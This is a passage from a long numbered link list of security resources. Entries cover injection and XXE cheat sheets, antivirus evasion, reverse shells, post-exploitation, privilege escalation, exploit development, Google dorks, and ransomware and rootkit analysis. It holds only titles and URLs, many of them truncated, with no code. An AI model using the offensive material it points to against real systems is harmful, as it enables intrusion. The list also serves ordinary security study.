-927-Cross-site Request Forgery - Exploitation & Prevention: https://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/ -928-SQL Injection Cheat Sheet : https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ -929-MySQL SQL Injection Practical Cheat Sheet: https://www.perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/ -930-SQL Injection (SQLi) - Cheat Sheet, Attack Examples & Protection: https://www.checkmarx.com/knowledge/knowledgebase/SQLi -931-SQL injection attacks: A cheat sheet for business pros: https://www.techrepublic.com/.../sql-injection-attacks-a-cheat-sheet-for-business-pros/ -932-The SQL Injection Cheat Sheet: https://biztechmagazine.com/article/.../guide-combatting-sql-injection-attacks-perfcon -933-SQL Injection Cheat Sheet: https://resources.infosecinstitute.com/sql-injection-cheat-sheet/ -934-Comprehensive SQL Injection Cheat Sheet: https://www.darknet.org.uk/2007/05/comprehensive-sql-injection-cheat-sheet/ -935-MySQL SQL Injection Cheat Sheet: pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet -936-SQL Injection Cheat Sheet: MySQL: https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mysql/ -937- MySQL Injection Cheat Sheet: https://www.asafety.fr/mysql-injection-cheat-sheet/ -938-SQL Injection Cheat Sheet: https://www.reddit.com/r/netsec/comments/7l449h/sql_injection_cheat_sheet/ -939-Google dorks cheat sheet 2019: https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019 -940-Command Injection Cheatsheet : https://hackersonlineclub.com/command-injection-cheatsheet/ -941-OS Command Injection Vulnerability: https://www.immuniweb.com/vulnerability/os-command-injection.html -942-OS Command Injection: https://www.checkmarx.com/knowledge/knowledgebase/OS-Command_Injection -943-Command Injection: The Good, the Bad and the Blind: https://www.gracefulsecurity.com/command-injection-the-good-the-bad-and-the-blind/ -944-OS command injection: https://portswigger.net › Web Security Academy › OS command injection -945-How to Test for Command Injection: https://blog.securityinnovation.com/blog/.../how-to-test-for-command-injection.html -946-Data Exfiltration via Blind OS Command Injection: https://www.contextis.com/en/blog/data-exfiltration-via-blind-os-command-injection -947-XXE Cheatsheet: https://www.gracefulsecurity.com/xxe-cheatsheet/ -948-bugbounty-cheatsheet/xxe.: https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md -949-XXE - Information Security: https://phonexicum.github.io/infosec/xxe.html -950-XXE Cheat Sheet: https://www.hahwul.com/p/xxe-cheat-sheet.html -951-Advice From A Researcher: Hunting XXE For Fun and Profit: https://www.bugcrowd.com/blog/advice-from-a-bug-hunter-xxe/ -952-Out of Band Exploitation (OOB) CheatSheet : https://www.notsosecure.com/oob-exploitation-cheatsheet/ -953-Web app penentration testing checklist and cheatsheet: www.malwrforensics.com/.../web-app-penentration-testing-checklist-and-cheatsheet-with-example -954-Useful Resources: https://lsdsecurity.com/useful-resources/ -955-Exploiting XXE Vulnerabilities in IIS/.NET: https://pen-testing.sans.org/.../entity-inception-exploiting-iis-net-with-xxe-vulnerabiliti... -956-Top 65 OWASP Cheat Sheet Collections - ALL IN ONE: https://www.yeahhub.com/top-65-owasp-cheat-sheet-collections-all-in-one/ -957-Hacking Resources: https://www.torontowebsitedeveloper.com/hacking-resources -958-Out of Band XML External Entity Injection: https://www.netsparker.com/web...scanner/.../out-of-band-xml-external-entity-injectio... -959-XXE - ZeroSec - Adventures In Information Security: https://blog.zsec.uk/out-of-band-xxe-2/ -960-Blog - Automated Data Exfiltration with XXE: https://blog.gdssecurity.com/labs/2015/4/.../automated-data-exfiltration-with-xxe.html -961-My Experience during Infosec Interviews: https://medium.com/.../my-experience-during-infosec-interviews-ed1f74ce41b8 -962-Top 10 Security Risks on the Web (OWASP): https://sensedia.com/.../top-10-security-risks-on-the-web-owasp-and-how-to-mitigate-t... -963-Antivirus Evasion Tools [Updated 2019] : https://resources.infosecinstitute.com/antivirus-evasion-tools/ -964-Adventures in Anti-Virus Evasion: https://www.gracefulsecurity.com/anti-virus-evasion/ -965-Antivirus Bypass Phantom Evasion - 2019 : https://www.reddit.com/r/Kalilinux/.../antivirus_bypass_phantom_evasion_2019/ -966-Antivirus Evasion with Python: https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1 -967-Windows oneliners to get shell: https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/ -968-Does Veil Evasion Still Work Against Modern AntiVirus?: https://www.hackingloops.com/veil-evasion-virustotal/ -969-Google dorks cheat sheet 2019 : https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019 -970-Malware Evasion Techniques : https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques -971-How to become a cybersecurity pro: A cheat sheet: https://www.techrepublic.com/article/cheat-sheet-how-to-become-a-cybersecurity-pro/ -972-Bypassing Antivirus With Ten Lines of Code: https://hackingandsecurity.blogspot.com/.../bypassing-antivirus-with-ten-lines-of.html -973-Bypassing antivirus detection on a PDF exploit: https://www.digital.security/en/blog/bypassing-antivirus-detection-pdf-exploit -974-Generating Payloads & Anti-Virus Bypass Methods: https://uceka.com/2014/02/19/generating-payloads-anti-virus-bypass-methods/ -975-Apkwash Android Antivirus Evasion For Msfvemon: https://hackingarise.com/apkwash-android-antivirus-evasion-for-msfvemon/ -976-Penetration Testing with Windows Computer & Bypassing an Antivirus: https://www.prodefence.org/penetration-testing-with-windows-computer-bypassing-antivirus -978-Penetration Testing: The Quest For Fully UnDetectable Malware: https://www.foregenix.com/.../penetration-testing-the-quest-for-fully-undetectable-malware -979-AVET: An AntiVirus Bypassing tool working with Metasploit Framework : https://githacktools.blogspot.com -980-Creating an undetectable payload using Veil-Evasion Toolkit: https://www.yeahhub.com/creating-undetectable-payload-using-veil-evasion-toolkit/ -981-Evading Antivirus : https://sathisharthars.com/tag/evading-antivirus/ -982-AVPASS – All things in moderation: https://hydrasky.com/mobile-security/avpass/ -983-Complete Penetration Testing & Hacking Tools List: https://cybarrior.com/blog/2019/03/31/hacking-tools-list/ -984-Modern red teaming: 21 resources for your security team: https://techbeacon.com/security/modern-red-teaming-21-resources-your-security-team -985-BloodHound and CypherDog Cheatsheet : https://hausec.com/2019/04/15/bloodhound-and-cypherdog-cheatsheet/ -986-Redteam Archives: https://ethicalhackingguru.com/category/redteam/ -987-NMAP Commands Cheat Sheet: https://www.networkstraining.com/nmap-commands-cheat-sheet/ -988-Nmap Cheat Sheet: https://dhound.io/blog/nmap-cheatsheet -989-Nmap Cheat Sheet: From Discovery to Exploits: https://resources.infosecinstitute.com/nmap-cheat-sheet/ -990-Nmap Cheat Sheet and Pro Tips: https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/ -991-Nmap Tutorial: from the Basics to Advanced Tips: https://hackertarget.com/nmap-tutorial/ -992-How to run a complete network scan with OpenVAS; https://www.techrepublic.com/.../how-to-run-a-complete-network-scan-with-openvas/ -993-Nmap: my own cheatsheet: https://www.andreafortuna.org/2018/03/12/nmap-my-own-cheatsheet/ -994-Top 32 Nmap Command Examples For Linux Sys/Network Admins: https://www.cyberciti.biz/security/nmap-command-examples-tutorials/ -995-35+ Best Free NMap Tutorials and Courses to Become Pro Hacker: https://www.fromdev.com/2019/01/best-free-nmap-tutorials-courses.html -996-Scanning Tools: https://widesecurity.net/kali-linux/kali-linux-tools-scanning/ -997-Nmap - Cheatsheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/nmap/cheatsheet/ -998-Linux for Network Engineers: https://netbeez.net/blog/linux-how-to-use-nmap/ -999-Nmap Cheat Sheet: https://www.hackingloops.com/nmap-cheat-sheet-port-scanning-basics-ethical-hackers/ -1000-Tactical Nmap for Beginner Network Reconnaissance: https://null-byte.wonderhowto.com/.../tactical-nmap-for-beginner-network-reconnaiss... -1001-A Guide For Google Hacking Database: https://www.hackgentips.com/google-hacking-database/ -1002-2019 Data Breaches - The Worst Breaches, So Far: https://www.identityforce.com/blog/2019-data-breaches -1003-15 Vulnerable Sites To (Legally) Practice Your Hacking Skills: https://www.checkmarx.com/.../15-vulnerable-sites-to-legally-practice-your-hacking-skills -1004-Google Hacking Master List : https://it.toolbox.com/blogs/rmorril/google-hacking-master-list-111408 -1005-Smart searching with googleDorking | Exposing the Invisible: https://exposingtheinvisible.org/guides/google-dorking/ -1006-Google Dorks 2019: https://korben.info/google-dorks-2019-liste.html -1007-Google Dorks List and how to use it for Good; https://edgy.app/google-dorks-list -1008-How to Use Google to Hack(Googledorks): https://null-byte.wonderhowto.com/how-to/use-google-hack-googledorks-0163566/ -1009-Using google as hacking tool: https://cybertechies007.blogspot.com/.../using-google-as-hacking-tool-googledorks.ht... -1010-#googledorks hashtag on Twitter: https://twitter.com/hashtag/googledorks -1011-Top Five Open Source Intelligence (OSINT) Tools: https://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/ -1012-What is open-source intelligence (OSINT)?: https://www.microfocus.com/en-us/what-is/open-source-intelligence-osint -1013-A Guide to Open Source Intelligence Gathering (OSINT): https://medium.com/bugbountywriteup/a-guide-to-open-source-intelligence-gathering-osint-ca831e13f29c -1014-OSINT: How to find information on anyone: https://medium.com/@Peter_UXer/osint-how-to-find-information-on-anyone-5029a3c7fd56 -1015-What is OSINT? How can I make use of it?: https://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it -1016-OSINT Tools for the Dark Web: https://jakecreps.com/2019/05/16/osint-tools-for-the-dark-web/ -1017-A Guide to Open Source Intelligence (OSINT): https://www.cjr.org/tow_center_reports/guide-to-osint-and-hostile-communities.php -1018-An Introduction To Open Source Intelligence (OSINT): https://www.secjuice.com/introduction-to-open-source-intelligence-osint/ -1019-SSL & TLS HTTPS Testing [Definitive Guide] - Aptive: https://www.aptive.co.uk/blog/tls-ssl-security-testing/ -1020-Exploit Title: [Files Containing E-mail and Associated Password Lists]: https://www.exploit-db.com/ghdb/4262/?source=ghdbid -1021-cheat_sheets: http://zachgrace.com/cheat_sheets/ -1022-Intel SYSRET: https://pentestlab.blog/2017/06/14/intel-sysret -1023-Windows Preventive Maintenance Best Practices: http://www.professormesser.com/free-a-plus-training/220-902/windows-preventive-maintenance-best-practices/ -1024-An Overview of Storage Devices: http://www.professormesser.com/?p=19367 -1025-An Overview of RAID: http://www.professormesser.com/?p=19373 -1026-How to Troubleshoot: http://www.professormesser.com/free-a-plus-training/220-902/how-to-troubleshoot/ -1027-Mobile Device Security Troubleshooting: http://www.professormesser.com/free-a-plus-training/220-902/mobile-device-security-troubleshooting/ -1028-Using Wireshark: Identifying Hosts and Users: https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/ -1029-Using Wireshark - Display Filter Expressions: https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/ -1030-Decrypting SSL/TLS traffic with Wireshark: https://resources.infosecinstitute.com/decrypting-ssl-tls-traffic-with-wireshark/ -1031-A collection of handy Bash One-Liners and terminal tricks for data processing and Linux system maintenance.: https://onceupon.github.io/Bash-Oneliner/ -1032- Bash One-Liners Explained, Part I: Working with files : https://catonmat.net/bash-one-liners-explained-part-one -1033-Bash One-Liners Explained, Part IV: Working with history: https://catonmat.net/bash-one-liners-explained-part-four -1034-Useful bash one-liners : https://github.com/stephenturner/oneliners -1035-Some Random One-liner Linux Commands [Part 1]: https://www.ostechnix.com/random-one-liner-linux-commands-part-1/ -1036-The best terminal one-liners from and for smart admins + devs.: https://www.ssdnodes.com/tools/one-line-wise/ -1037-Shell one-liner: https://rosettacode.org/wiki/Shell_one-liner#Racket -1038-SSH Cheat Sheet: http://pentestmonkey.net/tag/ssh -1039-7000 Google Dork List: https://pastebin.com/raw/Tdvi8vgK -1040-GOOGLE HACKİNG DATABASE – GHDB: https://pastebin.com/raw/1ndqG7aq -1041-STEALING PASSWORD WITH GOOGLE HACK: https://pastebin.com/raw/x6BNZ7NN -1042-Hack Remote PC with PHP File using PhpSploit Stealth Post-Exploitation Framework: http://www.hackingarticles.in/hack-remote-pc-with-php-file-using-phpsploit-stealth-post-exploitation-framework -1043-Open Source database of android malware: www.code.google.com/archive/p/androguard/wikis/DatabaseAndroidMalwares.wiki -1044-big-list-of-naughty-strings: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt -1045-publicly available cap files: http://www.netresec.com/?page=PcapFiles -1046-“Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.119.399&rep=rep1&type=pdf -1047-Building a malware analysis toolkit: https://zeltser.com/build-malware-analysis-toolkit/ -1048-Netcat Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet -1049-Packers and crypters: http://securityblog.gr/2950/detect-packers-cryptors-and-compilers/ -1050-Evading antivirus: http://www.blackhillsinfosec.com/?p=5094 -1051-cheat sheets and information,The Art of Hacking: https://github.com/The-Art-of-Hacking -1052-Error-based SQL injection: https://www.exploit-db.com/docs/37953.pdf -1053-XSS cheat sheet: https://www.veracode.com/security/xss -1054-Active Directory Enumeration with PowerShell: https://www.exploit-db.com/docs/46990 -1055-Buffer Overflows, C Programming, NSA GHIDRA and More: https://www.exploit-db.com/docs/47032 -1056-Analysis of CVE-2019-0708 (BlueKeep): https://www.exploit-db.com/docs/46947 -1057-Windows Privilege Escalations: https://www.exploit-db.com/docs/46131 -1058-The Ultimate Guide For Subdomain Takeover with Practical: https://www.exploit-db.com/docs/46415 -1059-File transfer skills in the red team post penetration test: https://www.exploit-db.com/docs/46515 -1060-How To Exploit PHP Remotely To Bypass Filters & WAF Rules: https://www.exploit-db.com/docs/46049 -1061-Flying under the radar: https://www.exploit-db.com/docs/45898 -1062-what is google hacking? and why it is useful ?and how you can learn how to use it: https://twitter.com/cry__pto/status/1142497470825545729?s=20 -1063-useful blogs for penetration testers: https://twitter.com/cry__pto/status/1142497470825545729?s=20 -1064-useful #BugBounty resources & links & tutorials & explanations & writeups :: https://twitter.com/cry__pto/status/1143965322233483265?s=20 -1065-Union- based SQL injection: http://securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html -1066-Broken access control: https://www.happybearsoftware.com/quick-check-for-access-control-vulnerabilities-in-rails -1067-Understanding firewall types and configurations: http://searchsecurity.techtarget.com/feature/The-five-different-types-of-firewalls -1068-5 Kali Linux tricks that you may not know: https://pentester.land/tips-n-tricks/2018/11/09/5-kali-linux-tricks-that-you-may-not-know.html -1069-5 tips to make the most of Twitter as a pentester or bug bounty hunter: https://pentester.land/tips-n-tricks/2018/10/23/5-tips-to-make-the-most-of-twitter-as-a-pentester-or-bug-bounty-hunter.html -1060-A Guide To Subdomain Takeovers: https://www.hackerone.com/blog/Guide-Subdomain-Takeovers -1061-Advanced Recon Automation (Subdomains) case 1: https://medium.com/p/9ffc4baebf70 -1062-Security testing for REST API with w3af: https://medium.com/quick-code/security-testing-for-rest-api-with-w3af-2c43b452e457?source=post_recirc---------0------------------ -1062-The Lazy Hacker: https://securit.ie/blog/?p=86 -1063-Practical recon techniques for bug hunters & pen testers: https://github.com/appsecco/practical-recon-levelup0x02/raw/200c43b58e9bf528a33c9dfa826fda89b229606c/practical_recon.md -1064-A More Advanced Recon Automation #1 (Subdomains): https://poc-server.com/blog/2019/01/18/advanced-recon-subdomains/ -1065-Expanding your scope (Recon automation #2): https://poc-server.com/blog/2019/01/31/expanding-your-scope-recon-automation/ -1066-RCE by uploading a web.config: https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -1067-Finding and exploiting Blind XSS: https://enciphers.com/finding-and-exploiting-blind-xss/ -1068-Google dorks list 2018: http://conzu.de/en/google-dork-liste-2018-conzu -1096-Out of Band Exploitation (OOB) CheatSheet: https://www.notsosecure.com/oob-exploitation-cheatsheet/ -1070-Metasploit Cheat Sheet: https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/ -1071-Linux Post Exploitation Cheat Sheet : red-orbita.com/?p=8455 -1072-OSCP/Pen Testing Resources : https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45 -1073-Out Of Band Exploitation (OOB) CheatSheet : https://packetstormsecurity.com/files/149290/Out-Of-Band-Exploitation-OOB-CheatSheet.html -1074-HTML5 Security Cheatsheet: https://html5sec.org/ -1075-Kali Linux Cheat Sheet for Penetration Testers: https://www.blackmoreops.com/2016/12/20/kali-linux-cheat-sheet-for-penetration-testers/ -1076-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1076-Windows Post-Exploitation Command List: pentest.tonyng.net/windows-post-exploitation-command-list/ -1077-Transfer files (Post explotation) - CheatSheet https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/ -1078-SQL Injection Cheat Sheet: MSSQL — GracefulSecurity: https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/ -1079-OSCP useful resources and tools: https://acknak.fr/en/articles/oscp-tools/ -1080-Penetration Testing 102 - Windows Privilege Escalation - Cheatsheet: www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet -1081-Transferring files from Kali to Windows (post exploitation) : https://blog.ropnop.com/transferring-files-from-kali-to-windows/ -1082-Hack Like a Pro: The Ultimate Command Cheat Sheet for Metasploit: https://null-byte.wonderhowto.com/.../hack-like-pro-ultimate-command-cheat-sheet-f... -1083-OSCP Goldmine (not clickbait): 0xc0ffee.io/blog/OSCP-Goldmine -1084-Privilege escalation: Linux : https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux -1085-Exploitation Tools Archives : https://pentesttools.net/category/exploitationtools/ -1086-From Local File Inclusion to Remote Code Execution - Part 1: https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1 -1087-Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ -1088-Title: Ultimate Directory Traversal & Path Traversal Cheat Sheet: www.vulnerability-lab.com/resources/documents/587.txt -1089-Binary Exploitation: https://pwndevils.com/hacking/howtwohack.html 1090-A guide to Linux Privilege Escalation: https://payatu.com/guide-linux-privilege-escalation/ -1091-Penetration Testing Tools Cheat Sheet : https://news.ycombinator.com/item?id=11977304 -1092-List of Metasploit Commands - Cheatsheet: https://thehacktoday.com/metasploit-commands/ -1093-A journey into Radare 2 – Part 2: Exploitation: https://www.megabeets.net/a-journey-into-radare-2-part-2/ -1094-Remote Code Evaluation (Execution) Vulnerability: https://www.netsparker.com/blog/web-security/remote-code-evaluation-execution/ -1095-Exploiting Python Code Injection in Web Applications: https://www.securitynewspaper.com/.../exploiting-python-code-injection-web-applicat... -1096-Shells · Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html -1097-MongoDB Injection cheat sheet Archives: https://blog.securelayer7.net/tag/mongodb-injection-cheat-sheet/ -1098-Basic Shellshock Exploitation: https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/ -1099-Wireshark Tutorial and Tactical Cheat Sheet : https://hackertarget.com/wireshark-tutorial-and-cheat-sheet/ -1100-Windows Command Line cheatsheet (part 2): https://www.andreafortuna.org/2017/.../windows-command-line-cheatsheet-part-2-wm... -1101-Detecting WMI exploitation: www.irongeek.com/i.php?page=videos/derbycon8/track-3-03...exploitation... 1102-Metasploit Cheat Sheet - Hacking Land : https://www.hacking.land/2019/02/metasploit-cheat-sheet.html -1103-5 Practical Scenarios for XSS Attacks: https://pentest-tools.com/blog/xss-attacks-practical-scenarios/ -1104-Ultimate gdb cheat sheet: http://nadavclaudecohen.com/2017/10/10/ultimate-gdb-cheat-sheet/ -1105-Reverse Engineering Cheat Sheet: https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet -1106-Reverse Engineering Cheat Sheet: https://www.scribd.com/document/94575179/Reverse-Engineering-Cheat-Sheet -1107-Reverse Engineering For Malware Analysis: https://eforensicsmag.com/reverse_engi_cheatsheet/ -1108-Reverse-engineering Cheat Sheets : https://www.cheatography.com/tag/reverse-engineering/ -1109-Shortcuts for Understanding Malicious Scripts: https://www.linkedin.com/pulse/shortcuts-understanding-malicious-scripts-viviana-ross -1110-WinDbg Malware Analysis Cheat Sheet : https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/ -1111-Cheat Sheet for Malware Analysis: https://www.andreafortuna.org/2016/08/16/cheat-sheet-for-malware-analysis/ -1112-Tips for Reverse-Engineering Malicious Code : https://www.digitalmunition.me/tips-reverse-engineering-malicious-code-new-cheat-sheet -1113-Cheatsheet for radare2 : https://leungs.xyz/reversing/2018/04/16/radare2-cheatsheet.html -1114-Reverse Engineering Cheat Sheets: https://www.pinterest.com/pin/576390452300827323/ -1115-Reverse Engineering Resources-Beginners to intermediate Guide/Links: https://medium.com/@vignesh4303/reverse-engineering-resources-beginners-to-intermediate-guide-links-f64c207505ed -1116-Malware Resources : https://www.professor.bike/malware-resources -1117-Zero-day exploits: A cheat sheet for professionals: https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/ -1118-Getting cozy with exploit development: https://0x00sec.org/t/getting-cozy-with-exploit-development/5311 -1119-appsec - Web Security Cheatsheet : https://security.stackexchange.com/questions/2985/web-security-cheatsheet-todo-list -1120-PEDA - Python Exploit Development Assistance For GDB: https://www.pinterest.ru/pin/789044797190775841/ -1121-Exploit Development Introduction (part 1) : https://www.cybrary.it/video/exploit-development-introduction-part-1/ -1122-Windows Exploit Development: A simple buffer overflow example: https://medium.com/bugbountywriteup/windows-expliot-dev-101-e5311ac284a -1123-Exploit Development-Everything You Need to Know: https://null-byte.wonderhowto.com/how-to/exploit-development-everything-you-need-know-0167801/ -1124-Exploit Development : https://0x00sec.org/c/exploit-development -1125-Exploit Development - Infosec Resources: https://resources.infosecinstitute.com/category/exploit-development/ -1126-Exploit Development : https://www.reddit.com/r/ExploitDev/ -1127-A Study in Exploit Development - Part 1: Setup and Proof of Concept : https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept -1128-Exploit Development for Beginners: https://www.youtube.com/watch?v=tVDuuz60KKc -1129-Introduction to Exploit Development: https://www.fuzzysecurity.com/tutorials/expDev/1.html -1130-Exploit Development And Reverse Engineering: https://www.immunitysec.com/services/exploit-dev-reverse-engineering.html -1131-wireless forensics: https://www.sans.org/reading-room/whitepapers/wireless/80211-network-forensic-analysis-33023 -1132-fake AP Detection: https://www.sans.org/reading-room/whitepapers/detection/detecting-preventing-rogue-devices-network-1866 -1133-In-Depth analysis of SamSam Ransomware: https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/ -1134-WannaCry ransomware: https://www.endgame.com/blog/technical-blog/wcrywanacry-ransomware-technical-analysis -1135-malware analysis: https://www.sans.org/reading-room/whitepapers/malicious/paper/2103 -1136-Metasploit's detailed communication and protocol writeup: https://www.exploit-db.com/docs/english/27935-metasploit---the-exploit-learning-tree.pdf -1137-Metasploit's SSL-generation module:: https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/lib/rex/post/meterpreter/client.rb -1139-Empire IOCs:: https://www.sans.org/reading-room/whitepapers/detection/disrupting-empire-identifying-powershell-empire-command-control-activity-38315 -1140-excellent free training on glow analysis: http://opensecuritytraining.info/Flow.html -1141-NetFlow using Silk: https://tools.netsa.cert.org/silk/analysis-handbook.pdf -1142-Deep Packet Inspection: https://is.muni.cz/th/ql57c/dp-svoboda.pdf -1143-Detecting Behavioral Personas with OSINT and Datasploit: https://www.exploit-db.com/docs/45543 -1144-WordPress Penetration Testing using WPScan and MetaSploit: https://www.exploit-db.com/docs/45556 -1145-Bulk SQL Injection using Burp-to-SQLMap: https://www.exploit-db.com/docs/45428 -1146-XML External Entity Injection - Explanation and Exploitation: https://www.exploit-db.com/docs/45374 -1147- Web Application Firewall (WAF) Evasion Techniques #3 (CloudFlare and ModSecurity OWASP CRS3): https://www.exploit-db.com/docs/45368 -1148-File Upload Restrictions Bypass: https://www.exploit-db.com/docs/45074 -1149-VLAN Hopping Attack: https://www.exploit-db.com/docs/45050 -1150-Jigsaw Ransomware Analysis using Volatility: https://medium.com/@0xINT3/jigsaw-ransomware-analysis-using-volatility-2047fc3d9be9 -1151-Ransomware early detection by the analysis of file sharing traffic: https://www.sciencedirect.com/science/article/pii/S108480451830300X -1152-Do You Think You Can Analyse Ransomware?: https://medium.com/asecuritysite-when-bob-met-alice/do-you-think-you-can-analyse-ransomware-bbc813b95529 -1153-Analysis of LockerGoga Ransomware : https://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/ -1154-Detection and Forensic Analysis of Ransomware Attacks : https://www.netfort.com/assets/NetFort-Ransomware-White-Paper.pdf -1155-Bad Rabbit Ransomware Technical Analysis: https://logrhythm.com/blog/bad-rabbit-ransomware-technical-analysis/ -1156-NotPetya Ransomware analysis : https://safe-cyberdefense.com/notpetya-ransomware-analysis/ -1157-Identifying WannaCry on Your Server Using Logs: https://www.loggly.com/blog/identifying-wannacry-server-using-logs/ -1158-The past, present, and future of ransomware: https://www.itproportal.com/features/the-past-present-and-future-of-ransomware/ -1159-The dynamic analysis of WannaCry ransomware : https://ieeexplore.ieee.org/iel7/8318543/8323471/08323682.pdf -1160-Malware Analysis: Ransomware - SlideShare: https://www.slideshare.net/davidepiccardi/malware-analysis-ransomware -1161-Article: Anatomy of ransomware malware: detection, analysis : https://www.inderscience.com/info/inarticle.php?artid=84399 -1162-Tracking desktop ransomware payments : https://www.blackhat.com/docs/us-17/wednesday/us-17-Invernizzi-Tracking-Ransomware-End-To-End.pdf -1163-What is Ransomware? Defined, Explained, and Explored: https://www.forcepoint.com/cyber-edu/ransomware -1164-Detect and Recover from Ransomware Attacks: https://www.indexengines.com/ransomware -1165-Wingbird rootkit analysis: https://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html -1166-Windows Kernel Rootkits: Techniques and Analysis: https://www.offensivecon.org/trainings/2019/windows-kernel-rootkits-techniques-and-analysis.html -1167-Rootkit: What is a Rootkit and How to Detect It : https://www.veracode.com/security/rootkit -1168-Dissecting Turla Rootkit Malware Using Dynamic Analysis: https://www.lastline.com/.../dissecting-turla-rootkit-malware-using-dynamic-analysis/ -1169-Rootkits and Rootkit Detection (Windows Forensic Analysis) Part 2: https://what-when-how.com/windows-forensic-analysis/rootkits-and-rootkit-detection-windows-forensic-analysis-part-2/ -1170-ZeroAccess – an advanced kernel mode rootkit : https://www.botnetlegalnotice.com/ZeroAccess/files/Ex_12_Decl_Anselmi.pdf -1171-Rootkit Analysis Identification Elimination: https://acronyms.thefreedictionary.com/Rootkit+Analysis+Identification+Elimination -1172-TDL3: The Rootkit of All Evil?: static1.esetstatic.com/us/resources/white-papers/TDL3-Analysis.pdf -1173-Avatar Rootkit: Dropper Analysis: https://resources.infosecinstitute.com/avatar-rootkit-dropper-analysis-part-1/ -1174-Sality rootkit analysis: https://www.prodefence.org/sality-rootkit-analysis/ -1175-RootKit Hook Analyzer: https://www.resplendence.com/hookanalyzer/ -1176-Behavioral Analysis of Rootkit Malware: https://isc.sans.edu/forums/diary/Behavioral+Analysis+of+Rootkit+Malware/1487/ -1177-Malware Memory Analysis of the IVYL Linux Rootkit: https://apps.dtic.mil/docs/citations/AD1004349 -1178-Analysis of the KNARK rootkit : https://linuxsecurity.com/news/intrusion-detection/analysis-of-the-knark-rootkit -1179-32 Bit Windows Kernel Mode Rootkit Lab Setup with INetSim : https://medium.com/@eaugusto/32-bit-windows-kernel-mode-rootkit-lab-setup-with-inetsim-e49c22e9fcd1 -1180-Ten Process Injection Techniques: A Technical Survey of Common and Trending Process Injection Techniques: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process -1181-Code & Process Injection - Red Teaming Experiments: https://ired.team/offensive-security/code-injection-process-injection -1182-What Malware Authors Don't want you to know: https://www.blackhat.com/.../asia-17-KA-What-Malware-Authors-Don't-Want-You-To-Know -1183-.NET Process Injection: https://medium.com/@malcomvetter/net-process-injection-1a1af00359bc -1184-Memory Injection like a Boss : https://www.countercept.com/blog/memory-injection-like-a-boss/ -1185-Process injection - Malware style: https://www.slideshare.net/demeester1/process-injection -1186-Userland API Monitoring and Code Injection Detection: https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565 -1187-Unpacking Redaman Malware & Basics of Self-Injection Packers: https://liveoverflow.com/unpacking-buhtrap-malware-basics-of-self-injection-packers-ft-oalabs-2/ -1188-Code injection on macOS: https://knight.sc/malware/2019/03/15/code-injection-on-macos.html -1189-(Shell)Code Injection In Linux Userland : https://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md -1190-Code injection on Windows using Python: https://www.andreafortuna.org/2018/08/06/code-injection-on-windows-using-python-a-simple-example/ -1191-What is Reflective DLL Injection and how can be detected?: https://www.andreafortuna.org/cybersecurity/what-is-reflective-dll-injection-and-how-can-be-detected/ -1192-Windows Process Injection: https://modexp.wordpress.com/2018/08/23/process-injection-propagate/ -1193-A+ cheat sheet: https://www.slideshare.net/abnmi/a-cheat-sheet -1194-A Bettercap Tutorial — From Installation to Mischief: https://danielmiessler.com/study/bettercap/ -1195-Debugging Malware with WinDbg: https://www.ixiacom.com/company/blog/debugging-malware-windbg -1195-Malware analysis, my own list of tools and resources: https://www.andreafortuna.org/2016/08/05/malware-analysis-my-own-list-of-tools-and-resources/ -1196-Getting Started with Reverse Engineering: https://lospi.net/developing/software/.../assembly/2015/03/.../reversing-with-ida.html -1197-Debugging malicious windows scriptlets with Google chrome: https://medium.com/@0xamit/debugging-malicious-windows-scriptlets-with-google-chrome-c31ba409975c -1198-Intro to Radare2 for Malware Analysis: 